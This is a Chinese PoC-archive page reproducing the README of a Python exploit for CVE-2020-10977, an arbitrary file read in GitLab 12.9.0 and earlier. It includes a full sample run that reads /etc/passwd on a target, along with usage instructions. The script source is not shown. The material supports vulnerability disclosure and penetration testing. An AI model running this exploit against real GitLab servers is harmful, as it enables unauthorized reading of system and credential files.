关联漏洞
标题:
GitLab 路径遍历漏洞
(CVE-2020-10977)
描述:GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
描述
GitLab 12.9.0 Arbitrary File Read
介绍
# CVE-2020-10977
## GitLab 12.9.0 Arbitrary File Read
**Target :** 12.9.0 and below
**Tested :** GitLab 12.8.1
In a recent engagement I found a GitLab instance on the target, I found a PoC on Exploit-DB but it uses LDAP for authentication and it was disabled in this case, so I created this python script which can authenticate using web GUI, like the original PoC it will create two projects, an issue in one of the projects with the malicious payload and it will move this issue from one project to another and will automatically read the file contents.
I have added few things such as the script will ask for an absolute path you wish to read, after printing its contents it will ask for another path and cleanup on exit, both projects will be automatically deleted when you exit the script using `CTRL+C`
```
$ python3 cve_2020_10977.py http://localhost twh p4ssw0rd
----------------------------------
--- CVE-2020-10977 ---------------
--- GitLab Arbitrary File Read ---
--- 12.9.0 & Below ---------------
----------------------------------
[>] Found By : vakzz [ https://hackerone.com/reports/827052 ]
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[+] Target : http://localhost
[+] Username : twh
[+] Password : p4ssw0rd
[+] Project Names : ProjectOne, ProjectTwo
[!] Trying to Login...
[+] Login Successful!
[!] Creating ProjectOne...
[+] ProjectOne Created Successfully!
[!] Creating ProjectTwo...
[+] ProjectTwo Created Successfully!
[>] Absolute Path to File : /etc/passwd
[!] Creating an Issue...
[+] Issue Created Successfully!
[!] Moving Issue...
[+] Issue Moved Successfully!
[+] File URL : http://localhost/twh/ProjectTwo/uploads/5f74b01d2b58e4a57ca55e1ac8778650/passwd
> /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
.
.
.
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
.
.
.
git:x:998:998::/var/opt/gitlab:/bin/sh
gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh
registry:x:993:993::/var/opt/gitlab/registry:/bin/sh
gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh
gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh
----------------------------------------
[>] Absolute Path to File : ^C
[-] Keyboard Interrupt
[!] Deleting ProjectOne...
[+] ProjectOne Successfully Deleted!
[!] Deleting ProjectTwo...
[+] ProjectTwo Successfully Deleted!
```
## Dependencies
```
pip3 install requests bs4
```
## Usage
Register an account on target GitLab and use the same credentials with the script
```
$ python3 cve_2020_10977.py -h
usage: cve_2020_10977.py [-h] url username password
positional arguments:
url Target URL with http(s)://
username GitLab Username
password GitLab Password
optional arguments:
-h, --help show this help message and exit
```
## Credits
* Thank you `vakzz` for finding this bug in GitLab
* HackerOne Report : https://hackerone.com/reports/827052
* Thank you `KouroshRZ` for creating a PoC for this exploit
* Exploit-DB : https://www.exploit-db.com/exploits/48431
文件快照
[4.0K] /data/pocs/3ba05cc8a590eaa3234b64aa67040030ac2c77b3
├── [8.2K] cve_2020_10977.py
└── [3.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。